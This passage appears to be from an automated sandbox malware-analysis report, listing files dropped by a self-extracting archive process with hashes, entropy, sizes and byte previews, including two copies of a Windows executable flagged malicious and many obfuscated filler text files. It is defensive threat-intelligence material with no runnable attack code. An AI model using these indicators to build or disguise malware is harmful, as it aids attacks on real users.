                                                                                            Preview:..;...wY.d.p#...4-...j-1..:5X..c5.`....#.c.s......6VJ....F..L. K[..R.g......*../.....I....z...;..q..o..N...9.s..\..+.C.JN&...^.Q~n$g...|[.o.Y`. '.6?i..m...T_.....4Ca..rf./K.......D.<.O.Y..H".H.....[.9<.....K#FU<0..K....5.4.w.Y.7.3.4.....x.7.q.5.T.0.5.1.4.g.s.2.D.v.3.3.x.v.8.1.2.9.w.g.7.q.8.8.F.i.2.5.P.6.g.4.t.5.B.j.s.8.7.6.8.....G..I.3...g.F^;M,.6f..F....<S.Z.........'....0..).4..t..:D"{..'l..!.p...z.GVD.~...BPgB.)g.$.........W....'Z.q%;..i....+..\{W..e.f...HB..?.!y....A^8..gX..E}..a...K.Ao.Kp.s.A.....5.5.x.f.1.6.1.0.T.U.5.0.B.2.8.S.G.1.6.8.0.k.A.l.3.0.0.P.Y.f.j.d.8.3.7.....Z.c.8.V.2.6.4.o.5.1.H.5.....2.b.2.R.4.9.7.2.6.Q.V.U.1.7.6.0.H.G.2.F.7.u.f.4.p.C.X.5.7.3.9.6.7.t......%.Rd.......4}~...:.[.T.q...."7.H=z..........C.m.........#kQD.RE{.6.Wbv.....$...].../....#..1...ZW...?.J.D...O=.iy.0L....1...I.Y..84dm.......|4bc9..a...t.C;;.G.GP.-.=8.r.......}...-..8.......sW..F....V8.....9'F..#.d.u....J..>3f.T.....O...XQ.Q.....`...0......y4..._d7._.u...+.Y.....p.;
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):541
                                                                                            Entropy (8bit):5.500713602675913
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:L2PI9CSDd6C6hRVZfqNCaqJ8fIHuCk89QpKoWVkjPc:LH9fDd61XICaqQv8h1L
                                                                                            MD5:C19B7228B00C62EC73D9D397A8D5411C
                                                                                            SHA1:2602C88A1B59809A3100FAB34B09ABD8AA49357E
                                                                                            SHA-256:A43EF991601F3F4BB4BCCCECC42F7EE138E3ADB9E1AB8986D15AE5FFE9CFCACA
                                                                                            SHA-512:87860E453841667CE5FDE333B0D08E1AFBE8335BEA1551B8A77D4EAE4B5C467F43D74F08C96F95BD4893AEF029CA980A46EC031316D565E98F2434D69AF757E7
                                                                                            Malicious:false
                                                                                            Preview:3M8M129O40l96BLx57e7yT62w9O91i..TreeViewConstants BorderConstants..r6A4x792ipG20564Y0278dSU41dP6ty16Mo71X71So7e4XYe2yqLL27n1810H31L20wv2l1a3880bSsgMh32OBBmEy2xs0..DateTimeConstants FontConstants..0h11d68252o149HV81gXG4aKAt272YA96s06VX8fFN33988..StructureConstants GuiDateTimePicker..83Kd31EQ8M72d55lt0FCD4G07K54hIiW3xI92855R8IoT4Q292Yro5sm5aI43oO75874hlU05r517ibw5b9tY8465N9T861Pj3..FontConstants FontConstants..3O9675zw751VS30D7X5y8pq1p393ct0302N6e0r4tL6YpS6Eo392757S97422723Hu1a5785R23874o9kFMMY0K6oc..GuiDateTimePicker TreeViewConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):596
                                                                                            Entropy (8bit):5.463054222617093
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rXyQ220lRsKYT7N+cMoaZt9MjVueBP0yMA6cFKwfCcK6vsRc:zyBPMF+HZt9MjQemZA6ceyuc
                                                                                            MD5:932B923E6BBACB25F75103B5E1340469
                                                                                            SHA1:8A7933302671AC0AD727408DF4C9E233F0EAC1C0
                                                                                            SHA-256:AA374071E60CB09D2D90D2ABAF4707D93C1D4A0EE8DADE5706326F0C934EA43A
                                                                                            SHA-512:6848C73602601072D9017595EB43AB9BBADAA02B9C3B00945A2A258DFC24532E2B93664F0852F989DAFBA5ABE38922847BFAB3D8E4A6A4E234531D4C9E3813C0
                                                                                            Malicious:false
                                                                                            Preview:SV9v9d0s4..DateTimeConstants ToolbarConstants..X3Tt32i1e7i8T0845..ColorConstants ComboConstants..83y46jxPV37DycE0ae9saH1c1Zkb98o4c8Oqq8791x2Cc97DW327pH76vUKNB8X63U90t590Rf52BhQ9k..FileConstants ButtonConstants..5YG9j3Gbq5dg3U53x7v54VAAl299ZHVEfl..FontConstants FontConstants..4M6OuXQ5A56gE50p9CP6ltte675057k..FontConstants TreeViewConstants..cy58f738AF1Yc8iTi304D289BoA17o8LjK7q7827V2F4J112..ToolTipConstants ButtonConstants..7448Tv8T6q342CESw215c48GJIa0Xj7TsJrm5n376E449ZIc17BS5120f305ydF5BPP36fC0I387138z2N512685XO62ayr04O5CJLf97m065979o5mT33B4hKx20vbPjBY1F..ColorConstants StructureConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):696
                                                                                            Entropy (8bit):5.630432220552905
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:gVPcM5uRvFd/DSRN+IYjSuJKhMbAVW1FoA4wVivJ:5vFpORN+Ibu2Mbz1GcivJ
                                                                                            MD5:F1E2E47F76E808957B86AFA2CF191A38
                                                                                            SHA1:CF80DA736B5C9AF9C4FD745748E891E7F499846E
                                                                                            SHA-256:D23B2433D0F575D085723B5DE77F691220CF01E451FFD5427151D6EA263B6F31
                                                                                            SHA-512:4F94C1E289AA86FF93A1E9BF699A1AA0943897760A97B0F56E470864F21769899A08839EE150F2A2C7DDE6B7DB151B164072C56A20596A3B3F0A867DC457149E
                                                                                            Malicious:false
                                                                                            Preview:T7P5..TreeViewConstants UpDownConstants..tQeZSI6E083diY86i31e6A0Xb8Kh1UAg2F..FileConstants StructureConstants..OcJo5C3S4FlG3419z771DOiV109m6G2B1B45Z83L8d7gP70P8gb133Dq191ys6Ek6344q34v6eF991K39L55spnWW4LL7PO6B8..StructureConstants ButtonConstants..z2326mjg91c2EQ09Q70tD3T37KQxS0n7hz3Bai59wXd27hE2l10iNDO19V6Ls38RXR6M13Sr4V85SdY0y7i8718741IGfD2sv2X9..ButtonConstants BorderConstants..45719DDXPo12B299Y86G7r5574x76XaC908K74Z71g3VNGw0BVf4MI25MA47..GuiDateTimePicker DateTimeConstants..1L7A24L123zi1BUv0b3Qu1UG7c901MQ53Eel83pu0E5PHembm1nFp7c55vgwh0566udk2cggPm0m2Z9WZD7ymDQyplxz5td456dE33gfc83J98cTe1k31cM032F9fB3187L6E0Q97f1ie8A059f2k7rq9fX2472a25l1fEPVPxm7565M26m0n0x..ComboConstants FontConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):552
                                                                                            Entropy (8bit):5.539800752986542
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:74Sl/QRzH7gioF0Fzf+7JwGkj9bW/WP+KheIRvTLbXVT6hZN3AaBSccrZ1UcTine:rlYBZC0Fy7JwBogJUlBPiZpQFxuIf3I7
                                                                                            MD5:175F423AC70DCBEB0A79D89A979A9A7D
                                                                                            SHA1:551A20696979D9FDA40AEAC28F5696FCE888B439
                                                                                            SHA-256:0D35CCFB2FE98D9437800DD49B4F61F38B349911434839387E14FF8A644A013E
                                                                                            SHA-512:14378450DFE9BE761B74F7A9DD87875DFCF39DC1981A82A75F3F138B6102AC3410146995404CD3DA8730F9A03A9F1735962352324B02E282A768F71C8E75A5DF
                                                                                            Malicious:false
                                                                                            Preview:Eqgzy74gIJc49677iH6v8v7177u4a7J6J9jN13wtov22xk14OWLO24014O82P0FYtEE8Eq636l107N8SA75536Sx7x5MOFfW92B13e5nInN86i7Th3u6Gr5B27..ToolbarConstants ToolbarConstants..13tJ55E1RdMb32B22043eoN..GuiDateTimePicker StructureConstants..2W95X833m4AJzf3aq048857Aw75tL87E84xJ6x839x80h7ay5z88W7rLC9Htw2e4437KIVH408V6z6l5kot0qz19x18Se63f8k63i..ButtonConstants TreeViewConstants..YN9y3sl9S8ee5658IO6O56PCa67yRX1L042163s644jvZ814BI7Fw0C6CoT51508b84iKJoPx37Tr308..StructureConstants BorderConstants..7mj1d7197iT42lQOX5634PFs7DeU1Rr167H97EY..FileConstants DateTimeConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):503
                                                                                            Entropy (8bit):5.50546117774599
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:9uLnyutiuEqa6rZqjgn3DNAXBEsQ0zz0sS0:ELn/TZ/pdJAYsS0
                                                                                            MD5:B288D964AD7DA5A36163B8668F5B732F
                                                                                            SHA1:524658075F06DDD1ED23F6FBE27F949BE2C03F12
                                                                                            SHA-256:A63DD757096ADA2F9B78413839CB25F3F85B794AB07A312D34CD995177E8F4D8
                                                                                            SHA-512:945FE2A7F82C9FEAB0CFBD03C3701AFA533FAAC44DFD6E2F084D71260BAA7B733F9051E0043F57A0E5009E8DC36FCC12885237FC19E4A7CBF2909BBD6FF4BDAC
                                                                                            Malicious:false
                                                                                            Preview:9JUDF1FaAvn102F1389315S3532793k2V39S5arW80M7ub0Q1W542k2H32zwGRa110H1V693357Y17B40D4M88487e3J395M835Rhv8KJO6lqvd4KZ40P8yr9823x7d2682oC5J252..ColorConstants BorderConstants..iOw4L811r5uP7CGNG81fUH5j34nZ1Ee879z8Mxd850Z0Ou6..ColorConstants DateTimeConstants..3XW576q54Vr75va0Eti353J77UmI58P78TS6Cw582d936UrAR2b8Q06rf53e386585u1961B063547u2r0421j193W7G70YEyA034..UpDownConstants ToolbarConstants..TAWo8rSjF86W345125OI02V1OPI7CEkg1VIa495dZ3bExkjU9c4jki65y05Se11F58192PNgr72o..ButtonConstants BorderConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):557
                                                                                            Entropy (8bit):5.532576183180574
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rmMn4s5dOmO1HwekWpSBPJIPeqj+ZtcugZ:CqcmOSJVqCZuugZ
                                                                                            MD5:70C089B1F601043079566273D1443E4A
                                                                                            SHA1:F82D75F5767E179D98F89073F8E8FD4EEEC87784
                                                                                            SHA-256:C4764BA3715EA3C63D4ABE1C81E7EF224BB892E5E022059D91A1ABA1FFC492D2
                                                                                            SHA-512:6AED8EFE3D299AC85896FF909E1E6511BEA94E88DEE5EF9E4FDEBA5F89EC0B0B09C4E91458EA653AA6DF4AAB31CBBEDE01DEF2082E0E29DF87ABF41A7A56DE4D
                                                                                            Malicious:false
                                                                                            Preview:9cQ76eo52iT7a94L94qocZ1tS6736hW0786E1v3rvL80139u4X9g65gI0En74l3j300UiA57260AG8eX38k8582wpJ..UpDownConstants UpDownConstants..gp92O04zHc3p47DKi4VD58272o6B4g198v68Ss968hQ28Vxz55PCIue7x2456ne0he6563402v5812M2243m8q67g29s9yf340mlqg9ZIkkk99hZ591Jv3V..FileConstants TreeViewConstants..u620aCTX4tEWVy2W46J9g29195l7ZeF6vG8B7..TreeViewConstants UpDownConstants..Ct5608F7GvZLW3r83Q5k8WH1f5946Vh8aJ59yADU..FontConstants DateTimeConstants..3jo0oYPV6X75b3427P335WBULn87yO5lI1J7Fp7WppQx14L1001zh0yH9Q1W73ioig3fxQi1I5aHb6347O4i06K29n7yA451z6..FileConstants FileConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):511
                                                                                            Entropy (8bit):5.496171918619403
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:S9zlrfVPUyT6cWyxNr/62RHG3Taj78tWvRAuZMnK9lrGFnKR1kuuRLuOEbjLWsd:YzhdsDRyxZnVG3a4YvRhZWyUnKcgbt
                                                                                            MD5:6DD4E526E16732BE3E1E0CAE37165D8B
                                                                                            SHA1:1D723A8CD43390D8A7B0C7D1AF053C68096E74F0
                                                                                            SHA-256:B7A0DDA2CFCCDCE692203B51ABA2E781501D7556DEC897728CF15D2E608343E9
                                                                                            SHA-512:55E3BDE3FCA853A17A322BA2306E527770B3B81BDA105AC0CDD60A6EEFA68C2A11FB48E2BD3B18913612556A3DCF8B7A24C5E9890217CED389AE05FABF446FB4
                                                                                            Malicious:false
                                                                                            Preview:5bLv9i4DV7h13F35Q1lHUebQt9267B3936c74NGnnj1..FileConstants StructureConstants..6tTTgL0P..FileConstants BorderConstants..30RAwPp5jv1J45LXd0Y9kEP793dW72530p589J94t0p9Q2J65754v8D38z14KMAyJkfD44Bp..StructureConstants ComboConstants..20t48g0S3tB97168x650H1RNSaQq9f24t3HX08b7e77PCy0vdQ9l5Q1tw6499P22e2MJfqQv3m343E53Dv156307ZdX8V6P1tK6W091SQZ68..ToolTipConstants ComboConstants..jq8895W25Sy4..ComboConstants FontConstants..vK7FjA6Paet73D8SCS9Q7197i5X44w0dg8GrAFuDM9PGB66ZOj2CG11043m..DateTimeConstants ColorConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):545
                                                                                            Entropy (8bit):5.595661006652178
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:dPDmE6DUy5UMgwg2SK3nPv1u0rqZpeXuTwAa4KSVv:dd6DUya9aj7rIUXck4K0v
                                                                                            MD5:2BEDBFB01C22499C8A83EBA40F78F718
                                                                                            SHA1:152D97D5B14CC835D774C055C5F8979D12EE930B
                                                                                            SHA-256:652BFDED4DC71C958328FD04B32471A49B363181773047DFD3BD87C7038C653B
                                                                                            SHA-512:ED2A2C23AD34ED0712035FB5F4B846B9FC23B7C9F306C3974F3A4E7DB33E70D666B41E0865B81EBEC4E92BBFE6599766EEE81792E58BEC32DFB2FFCF2F0DA954
                                                                                            Malicious:false
                                                                                            Preview:60UC138F9P29okc5Ec178FHN3Y988w85QWI57L89C2U1K3Wco5646kX5q2tcrPD90813T23q1d8B4SMi69nkK6295F355408z4P591A0EYqV31P575hhxS1F70zos76N92rOqfcSwX3BDEea0y8h1eqN3..ButtonConstants UpDownConstants..19Wy1w376yx0jf4h5k6erqd0648J9ES1..TreeViewConstants DateTimeConstants..3LD2R9jA0X444I2sbRnQsOQ0efuWq95tQGV0WO2994FYeV4e03b395dMMx9H52G6EX8718G193S9HN1r721l00N9F11428839z8476aa7979FU76V5Ly76p2B474T1c221tQ08b5Q99x8653G7gL94oLy06168sKIu8wJJeR860fR129DIaS49f71..ComboConstants BorderConstants..XxG9P36BHf6g9C45E2w7757Q6s43Bx..UpDownConstants GuiDateTimePicker..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):521
                                                                                            Entropy (8bit):5.563439562316828
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DxrEDJK1mHLWAR9R0KnL0omJxCkR8wyjcAcIPrBPJeXWG3Wjn66PeX:2DJK1AFR31YoDkBRApml3WjnpWX
                                                                                            MD5:1BD2A3469A3BCC3FF9F22BA5671AF005
                                                                                            SHA1:A0BD6009C9B3F33B2E363C619366F1AC285B3FAB
                                                                                            SHA-256:B54E514348498E257ACC79B55F2E293EFD16500CDFFCE9EEDEE29A3C9ADC6F4E
                                                                                            SHA-512:14565C68B8AEAD502796D56492AB58243997AF2F8D6624CB5C418B879EF11A8D30684F0D7549009C7823B31164410BAA331EA889A218FED7ED2A6D1851CF5585
                                                                                            Malicious:false
                                                                                            Preview:yCb6bN1L50y48O83Z6KdkW71A23l03Ts3o01hp31Eo6fO5IE4L36690jR4Km69dFu9o04y1548B568x53zNUW3RzE7U72wR713..StructureConstants StructureConstants..7698l55WX8G9UP27D3917681fY50lixT5gO2Kuj2c5Qn52LbrE7SlVQ3Jcr33450i52Srv9Sem9861z..ButtonConstants FontConstants..ws813g4M92v9H7N1fLk132Eto01o7Q50602F6V9Wnb232cNTC90YoS5m463C24WGo3676766S61E167mW7Qqj2H..TreeViewConstants TreeViewConstants..2161Mo7Z0398s83mz4y8UCRJrW8XAT02a3l2hf279338sQ2d2rTCo1BbxZ1TB85397XGll36Bv8Is61qqVa6y01Z4M1p88o6ee939Umo8d4..UpDownConstants DateTimeConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.6296921617529625
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:KYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCMel:K37+KSbq5e1diEnHaCj
                                                                                            MD5:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            SHA1:A1AEA1DE9C42E1EF8C186EF6246DD318040E66DE
                                                                                            SHA-256:3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
                                                                                            SHA-512:20B4D8D117419A511CDE61EC37C488FCF86D8D6E9174DA2496CD71843E8C7F0DD5B7707E59E8404018F0C7074FEF610A48F68E274FA250E05AE89E474CEB8247
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                            • Antivirus: Virustotal, Detection: 28%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@.......................................@...@.......@.........................|....P.. ............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc... ....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.6296921617529625
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:KYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCMel:K37+KSbq5e1diEnHaCj
                                                                                            MD5:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            SHA1:A1AEA1DE9C42E1EF8C186EF6246DD318040E66DE
                                                                                            SHA-256:3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
                                                                                            SHA-512:20B4D8D117419A511CDE61EC37C488FCF86D8D6E9174DA2496CD71843E8C7F0DD5B7707E59E8404018F0C7074FEF610A48F68E274FA250E05AE89E474CEB8247
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                            • Antivirus: Virustotal, Detection: 28%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@.......................................@...@.......@.........................|....P.. ............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc... ....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):637
                                                                                            Entropy (8bit):5.545789512468366
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:5O6cf1wX/TV1tcmcRidP6C0R1G+xSJj2E+oOejlJIKY:Qw512liAlG+2j2E+vejcKY
                                                                                            MD5:40AAAD33EDF75CE37D096903A47E2903
                                                                                            SHA1:2D9A727395C3AE26789029CDDDB03732BB5497D3
                                                                                            SHA-256:1E24E240142BD9BC7699B1F623ECBB4AF545AD55B7B97744FDA87CC141417607
                                                                                            SHA-512:82CE7DC925BEF6ED2ECB8B53F7CAF1D1B70003790630D6B88F58AC7008719F9A74D32B9209A89AA5D5E41473B21E8B2EBF20CD53B1E57161796DF8C5FEA080DE
                                                                                            Malicious:false
                                                                                            Preview:7845IEklmAR2i15yP2Vq6r75D7CRq0A9C810Pc4C0Z2p9Cx5H663G..BorderConstants FileConstants..8Qsaz989KY741f4IQPp25k37sWUbow309d23v709a2Y5ROd4533060CG1721o8PU567L74ej00iVk72x918Mn2gm510628Yp8L98t97w353IPY2NW313i9B6SE4201..StructureConstants ColorConstants..1noa90168FL6M90gxYr9y90zS..TreeViewConstants ComboConstants..SN91856K4u46XIqes564406R64d60j7gBv3038F058HYX7I5do11FuW081p1Ztj2DIQg7486UY4qVf3n8RL50k28E304r7M47204e306..ToolTipConstants ComboConstants..97383hP2WB9Z8SQ2l3y668eq762iyx6m218011Z311Bu15hR2R801Fc79H98kdvP44X11bhR7EF07Z0DM5Iuy5g47T97fmEN101umL72Y4s70234y62402874y71jDB066495pOKujP7D670G443K41MTS..ToolbarConstants FileConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):89346
                                                                                            Entropy (8bit):2.858175113199945
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:2LLLLLLLLLLLLLLLLLLLLLLLLLLfnLLLLLLLLLLLLLLLLLLLLLLLLLLQLLLLLLLn:9a7LY1
                                                                                            MD5:FC246C3144BE92334A3962754FA98065
                                                                                            SHA1:66034A9C62AF32E7805C9DE03E9B9F1BEAA91F09
                                                                                            SHA-256:0173BF1ECB32E9357114EF512EE1B9A0DF13D7403B19D0CF85B49F7D7614639C
                                                                                            SHA-512:28ED1315926B07C83A92EAB743655ED413CF15F23C9F7226CF790E3BFA393CAE11DF9B13C440600F107D23F81F14D76E71C92B730594BAC37134C981EE8F7D03
                                                                                            Malicious:false
                                                                                            Preview:..L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.....L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.....L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):596
                                                                                            Entropy (8bit):5.497340705166392
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ly9TdpksIk0PKRVtsHmTTSb11q6rtHYRVrpVlRAsJta0:lYTPksEKRTT2R9Y7r7TAia0
                                                                                            MD5:4AA7FD332BC6C783FF86F34E92A1E9B0
                                                                                            SHA1:9D71388EE9B51110C59979BB66D2C313ABAFC41B
                                                                                            SHA-256:2B60A7FEE500564DECB8E12731F7A3CEF572EC9DD9EC27F30880966F5071E098
                                                                                            SHA-512:E36357D63E3306A9F267C2BD6CFC04CCD68FFA0001E425122839DBF58B2E9B773C20FD0ED2A4C869B9798283219CE417BB1DEA94413C026BD796409ED4003573
                                                                                            Malicious:false
                                                                                            Preview:2812Bpxe4Wvtzh53R6I9210Ion765mD61wt63619f4l4Pi356d50o4q3P6F24BGZ9580n7b2Q5298lD6907720..ButtonConstants UpDownConstants..4ZGHuZ103S712JG76ciK1747078Gv4g9u09B278TDHn897Qoz8643l3j500p78ih76f10sJ3Q570xB3KLu32t3tO2CO44Exv5W3ci49Z2u890K442..FileConstants BorderConstants..n0Z2h3pAfS7yWM2ZtA02034Y515Ky42B8G33M074317NTsqPbuc4d8UHh8r9593E85s9PPe3Cq75Q3037T194XO8uBR7tIP426777z5io6L8fgCYc3z336g9dp4eBf470l6098279B4eA..ComboConstants BorderConstants..noXUU17C08o19110m43414BG0mIm1j33N473682KMwS55H08hS3pp5BQ7Oy720h2O55M51fa1Qu4ap2658038jB9VKrGy1j146Q0SKIpEM717oc8LB4me91F..ComboConstants BorderConstants..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):43916
                                                                                            Entropy (8bit):5.58333748326412
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:5uSt3UMeB2h0U3h9crxHGQSUet4t6dwBaqe1LBBvDIm:5vt3jh0q+fSHttwwqMnD
                                                                                            MD5:DB23A994A69C590FC859FBB7EEE52728
                                                                                            SHA1:E12014FCDE1F04F6589C922DA2F92FFA62DD1E8E
                                                                                            SHA-256:F1057A78A1D8D834C273326A77DC0D29D09A5E8DB616E82053BBB0CB0C8B25F9
                                                                                            SHA-512:9C40A35C55C638AE1090F107E12DB5423EC3DFA9486F82075FC9FF2F144222C82D20DFC4B5BC8F19661D34FC16C550F31BDFDAF70EDC18ED34414B8E99EE1E22
                                                                                            Malicious:false
                                                                                            Preview:06jR3FHUq0ha50H7X5rqrq943fM4..387F3s5nv2IvFY533eZ6p47G3NGs38hu453245159I3mT1vm4N9Xkw6s7..rCHZB3W0757p2D56314X472p019cU6LZhi1HmP5..13JY4pAZtKA6mArLN8NTU479wHOdVa809..Xp09779xz9038wr179CVMNfQ23dbx0LOC52ykY1I309205nR34W2F..31S8rp61NVtS852pm428H97p6J86Q45Ejc8fLhcMx89E0Du09031PMQ22406ERYcn..6N3683216RuA8ue5967Pm59jdWac4Xu6W8g..HKKV0X045hby79EXq834oRdPr1od1e43164c70O33y4Dq20u8n9L129ezS8o29589Y22Y8..1472759q6543QM7gC6T32Q549HqT14m3147Re8Ff5S..zgQgKF8I8Q1vl3f5592B0473q73ZCE795..502E19thKh201815G31N261oA29HddN6kd26oMMN6oFf53qZ9K5EnexkJiVx6..HB5RD692U6559v4Mu8300Dk1FWyME0634n1S5Abp71XxFwYr..4KIf8rA3I06M5F06P7CZ0z4QA75mw4P3J57u7072G1nDeV806vRON70266w2W2Fl2..6L43Z332n36262UxX06O9Z6n9w2aHo3..89FSyxU36340H424n7f103FdMq616X8183n5x871L63D2IABd5Y7WT4aMHI4992341jKR9A70Q33d94o5A25P23w80C14..e8N1ihW2P25dQE085a7DXs747krVQ4V2JI26ex528c06J94dM573248Y5jIfrYA..8622946Fa5783t58p6g9b19uuJE8JJFC24j7ajBUZDt34eGkSs1D972lDt9p6T4..5aB1A6yLSf5BGvKXWBwgJy1MSOqa35O6hcKkK756..42i56q51wa7Df0Ijg97220a65J6z03K..m72k927kD206
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):549
                                                                                            Entropy (8bit):5.451056001588005
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:FLe25+BNcOeLkrKy3SiwMHl2s8vo9SY+BPmcLNM:FabcOSGKy3S1MHl2dvGSxBM
                                                                                            MD5:2098AB9B09F8EF8FDBAE1367325F06CC
                                                                                            SHA1:878A8A4F2DCD3CD912BC00463B539E3ADB48CAB7
                                                                                            SHA-256:016B23334F8AE86DF09D213E43C5F35C049EB7547098804E602F622EF8CD40D7
